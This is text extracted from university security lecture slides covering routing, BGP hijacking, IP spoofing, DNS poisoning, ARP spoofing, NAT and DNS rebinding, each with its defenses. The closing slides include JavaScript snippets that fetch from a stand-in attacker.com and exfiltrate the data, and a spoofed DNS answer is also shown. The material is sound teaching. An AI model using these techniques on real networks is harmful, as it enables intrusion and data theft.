Introduction to the Internet
ECEN 5032: Intro to Computer Security October 5, 2016
Internet: History
ARPANET “log”
Packet-switched network
Send chunks of data
Source address (from)
Destination address (to)
To: B From: A
Early packet-switched networks
“Best-effort”
Goal of the Internet
Get packet from A to B Quickly?
Reliably?
Securely?
F
H
M
A
P J
B R
G
Get packet to B!
BF
H
M
A
P J
B R
G
From H’s perspective
B
?
?
H
M
A
P J
Naïve approach: send to all
F
P J
B
B
H
M
B R
A
G
Naïve approach: send to all
B
F
H
M
G
BB
B
B R
A
P J
Naïve approach: send to all
B
F
P J
BB B
B
H
M
B R
B
A
G
B
B
Ahhhhh!! (BBBBB BBB BBBB…)
BB BB
BB B
F
B B
H
M
A
B
B
B
B R
P J
G
BB B
B
B
Back to H’s perspective
B
H
M
?
Send to all will not scale!
?
A
P J
Better approach:
send to next closest node
F
P J
B
H
M
B R
A
G
Better approach:
send to next closest node
F
H
M
G
B
B R
A
P J
Better approach:
send to next closest node
H
M
F
P J
B
A
G
B R
Better approach:
send to next closest node
F
H
M
A
P
R
B
B
J
G
Who is closer?
Enter:RoutingTables
Each node has a unique routing table
Tells a node who next to forward to (next hop), given a destination
H’s Routing table
Destination
Next Hop
A
–
H
J
–
M
–
A
J
F,P,R
M
G
J
B
M
M
F
P
G
B R
Classless Inter-Domain Routing (CIDR)
Blocks of IP addresses
Prefix
▪ 128.138.113.0 = 0x80 8a 71 00 ▪ 32-bit IPv4 address
Prefix size (number of significant bits)
▪ /24 = 0xFF FF FF 00 (24 bits of 1)
▪ Netmask: 255.255.255.0 (/24) 255.255.0.0 (/16)
E.g:
10.0.2.0/24 = 10.0.2.*
10.0.2.0/25 = 10.0.2.0 – 10.0.2.127 10.0.2.0/26 = 10.0.2.0 – 10.0.2.63
Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink 128.138.97.128/25 dev eno1 proto kernel scope link
# (old/deprecated way)
$ route -n
Kernel IP routing table
Destination Gateway
0.0.0.0 128.138.97.129
128.138.97.128 0.0.0.0
If packet to 128.138.97.128/25, send locally (direct to MAC addr) Else, forward packet to MAC of default gateway (128.138.97.129)
src 128.138.97.189
Genmask
0.0.0.0
255.255.255.128 U eno1
Flags Iface
UG eno1
Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink 128.138.97.128/25 dev eno1 proto kernel scope link
src 128.138.97.189
If packet to 128.138.97.128/25, send locally (direct to MAC addr)
Else, forward packet to MAC of default gateway (128.138.97.129)
128.138.97.129
MAC: aa:aa:..:aa
128.138.97.189
MAC: bb:bb:bb:bb:bb:bb
Internet
128.138.97.200
MAC: cc:cc:cc:cc:cc:cc
What do packets look like?
…
HTTP TLS
TCP
IP
MAC
Physical
HTML, Videos, Memes, cat pictures, … Application Layer
Transport Layer (e.g. TCP, UDP, SCTP) Network layer (e.g. IPv4, IPv6)
e.g. Ethernet (MAC addresses), ATM, …
e.g. WiFi, Ethernet cable, phone line, fiber, …
What does a packet look like?
d404cd867432f859718e99c30800450000bf74 f7400040067e9bc0a8000f12ea7305d7e60050 266cc951942d78aa801801f6f59c0000010108 0afdfc5bfa296efff1474554202f2048545450 2f312e310d0a557365722d4167656e743a2057 6765742f312e31392e3420286c696e75782d67 6e75290d0a4163636570743a202a2f2a0d0a41 63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a
What does a packet look like?
d404cd867432f859718e99c30800
Ethernet
450000bf74
f7400040067e9bc0a8000f12ea7305
IP
d7e60050
266cc951942d78aa801801f6f59c0000010108
TCP
0afdfc5bfa296efff1
474554202f2048545450
2f312e310d0a557365722d4167656e743a2057
6765742f312e31392e3420286c696e75782d67
6e75290d0a4163636570743a202a2f2a0d0a41
63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a
HTTP
What do packets look like?
Problem solved!
Real routing tables
Destinations are CIDR blocks
▪ E.g. 141.212.0.0/16
Next hop (gateway) is a single IP on a physically
connected network
▪ May belong to another Autonomous System (AS), E.g.: ▪ AS 237 (Merit)
▪ AS 104 (CU Boulder)
▪ AS 7018 (AT&T)
▪ AS 14041 (UCAR / FRGP)
…or is it?
How do we get these magical routing tables? Enter:BorderGatewayProtocol(BGP)
179/TCP connection between two routers
Provide reachability information via UPDATE messages
BGP UPDATE
F
H
M
G
A
P J
R
B
Hey everyone! I can reach B! AS PATH: R
BGP UPDATE
F
I can reach B! AS PATH: P R
H
M
A
P J
B R
G
BGP UPDATE
F
AS PATH:
F P R
I can reach B!
H
M
P J
I can reach B! AS PATH: G P R
A
G
B R
BGP UPDATE
F
H
M
AS PATH:
P
G
F P R
I can reach B! AS PATH: P R
I can reach B!
I can reach B! AS PATH: G P R
BGP UPDATE
I can reach B!
AS PATH:
F
M P R
H
M
A
P J
I can reach B! AS PATH: J G P R
B R
G
BGP UPDATE
I can reach B!
AS PATH:
H M P R
F
H
M
A
P J
B R
G
BGP UPDATE
HM PR
F PR M PR F
H
M
PR
B RR
G P R
A
P J
G
JG P R
BGP: Security?
F
H
M
A
P J
E
B R
G
I can reach B! AS PATH: E
BGP: Security?
F PR M PR F
H
M
HJ E
A
E
E
P J
PR
B RR
G
J E
GJ E
BGP “hijacks” of 1.0.0.0/8
1/8 Allocated
BGP: prefix hijacking
It gets worse:
Real routes are blocks (e.g. /16 network block) Choose shortest most specific AS PATH
Destination
Next Hop
AS PATH
128.138.0.0/16
192.12.80.70
104 (CU Boulder)
128.138.0.0/17
198.109.93.50
600 12145 (CSU)
128.138.128.0/17
198.109.93.50
600 12145 (CSU)
YouTube Hijack (Feb 2008)
AS36561 (YouTube): 208.65.152.0/22
YouTube Hijack (Feb 2008)
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24
YouTube Hijack (Feb 2008)
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24 AS36561 (YouTube): 208.65.153.0/24
YouTube Hijack (Feb 2008)
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24
AS36561 (YouTube): AS36561 (YouTube):
AS36561 (YouTube):
208.65.153.0/24 208.65.153.128/25 208.65.153.0/25
YouTube Hijack (Feb 2008)
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24
AS36561 (YouTube): AS36561 (YouTube):
AS36561 (YouTube):
208.65.153.0/24 208.65.153.128/25 208.65.153.0/25
http://youtu.be/IzLPKuAOe50
BGP hijack defenses
Not everyone gets to BGP
Multiple vantage points help detect hijacks
Human response vs Computers
S-BGP
soBGP
Pretty Secure BGP
Pretty Good BGP
But misconfigurations/DoS still common
IP spoofing
Who said we had to be honest about the source address?
IP spoofing: defenses
Ingress Filtering
Reverse Path Forwarding (detect lies with a FIB)
TCP
Each host uses sequence numbers (32-bits) to prevent blind spoofing
IP spoofing around defenses
Ingress Filtering not at all ISPs
TCP not perfect or the only protocol…
Backscatter
TCP windows? UDP?
UDP!
What uses UDP?
Networked Games VoIP (RTP)
DNS
DNS
1.2.3.4 -> 4.2.2.1
What’s the IP for www.hobocomp.com
(TXID: 45121)
4.2.2.1 -> 1.2.3.4
www.hobocomp.com IN A 68.40.59.167
(TXID: 45121) TTL 1789
DNS
1.2.3.4 -> 4.2.2.1
IP for ecen4133.org?
4.2.2.1 -> k.root-servers.net ;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
org. 172800 IN NS a0.org.afilias-nst.info. org. 172800 IN NS a2.org.afilias-nst.info.
;; ADDITIONAL SECTION:
a0.org.afilias-nst.info. 172800 IN A 199.19.56.1 a2.org.afilias-nst.info. 172800 IN A 199.249.112.1
DNS
4.2.2.1 -> 199.19.56.1 IP for ecen4133.org?
;; QUESTION SECTION: ;ecen4133.org.
;; AUTHORITY SECTION: ecen4133.org. 86400 IN ecen4133.org. 86400 IN
;; ADDITIONAL SECTION: ns8.zoneedit.com. 172800 IN ns16.zoneedit.com. 172800 IN
IN A
NS dns1.registrar-servers.com NS dns2.registrar-servers.com
A 75.125.10.187 A 69.64.68.41
. .
DNS
4.2.2.1 -> dns1.registrar-servers.com IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org.
;; ANSWER SECTION: ecen4133.org. 300 IN
;; AUTHORITY SECTION: ecen4133.org. 1800 IN ecen4133.org. 1800 IN
IN A
A 18.234.115.5
NS dns1.registrar-servers. NS dns2.registrar-servers.
c c
DNS
4.2.2.1 -> 1.2.3.4
I found your answer (finally!)
▪ ecen4133.org. IN A 18.234.115.5
Bad guy:
Spoof responses from 4.2.2.1 (or higher)
Has to guess the TXID… ▪ Only 65536 possible values
▪ Bandwidth helps
▪ Can play this game more than once
▪ Own 783.google.com? Great, delegate to www.google.com, which, oh, by the way, is 6.6.6.6
▪ “4.2.2.1” -> 1.2.3.4 (TXID lucky_guess) 783.google.com IN CNAME www.google.com www.google.com IN A 6.6.6.6
DNS poisoning defenses
Randomize source port on lookups
Lookup random case: “gOogLE.cOM” DNSSEC
Have records be signed by higher-level DNS
Network switches vs hubs
Hubs broadcast received packets to all other links
Switches only send to links that have sent from that Layer-2 address
E.g. If you see a packet from A on port 1, send all packets to A to port 1.
Attacks?
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
Who is 10.0.0.5?
(I’m 10.0.0.8 (cc:cc:cc:cc:cc:cc))
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc
Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.1
cc:cc:cc:cc:cc:cc
Cc:cc:cc:cc:cc:cc
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.8
10.0.0.5 aa:aa:aa:aa:aa:aa
ARP spoofing defenses?
ARP spoofing defenses
Hard-code/configure switch with specific MAC addresses on specific ports
Separate untrusted hosts onto a separate subnet/VLAN
Clients can track changes in IP <-> MAC mapping E.g. ArpON, ArpWatch
Cryptographically sign updates?
Hard to do without a trusted third-party that can vouch for identities (which remote CA-like entities can’t do)
Short answer: don’t trust your local subnet! Use VPNs/end-to-end encryption when possible
Network Address Translation (NAT)
Running out of IPv4 addresses (only 2^32 possible!)
Need a way to share public IPs with lots of hosts
RFC1918: Private IP addresses 10.0.0.0/8
192.168.0.0/16
172.16.0.0/12
Network Address Translation (NAT)
1. Hand out Private (RFC1918) addresses to local devices
2. Intercept outgoing connections (at the gateway), and replace private IP with the shared public address
3. Keep a map of outgoing source port/destination; return traffic must be translated back (to send to the original private IP)
Incoming connections?
DNS rebinding
Attacker wants to access hosts internal to a NAT (e.g. 10.0.0.1)
Can get victim on the NAT to visit attacker’s website (attacker.com, at 6.6.6.6)
Attacker tries to run Javascript: What happens?
$.get(‘http://10.0.0.1/’,
function(data) { exfiltrate(data); });
DNS rebinding
Attacker instead runs What happens?
$.get(‘http://attacker.com/’,
function(data) { exfiltrate(data); });
DNS rebinding
Attacker instead runs
What happens?
Browser checks to see if attacker.com’s DNS entry has
expired
If it has, make another DNS query for attacker.com
On this second query, attacker.com returns 10.0.0.1 Browser makes HTTP request to 10.0.0.1,
defeating the Same-Origin Policy! Defenses?
$.get(‘http://attacker.com/’,
function(data) { exfiltrate(data); });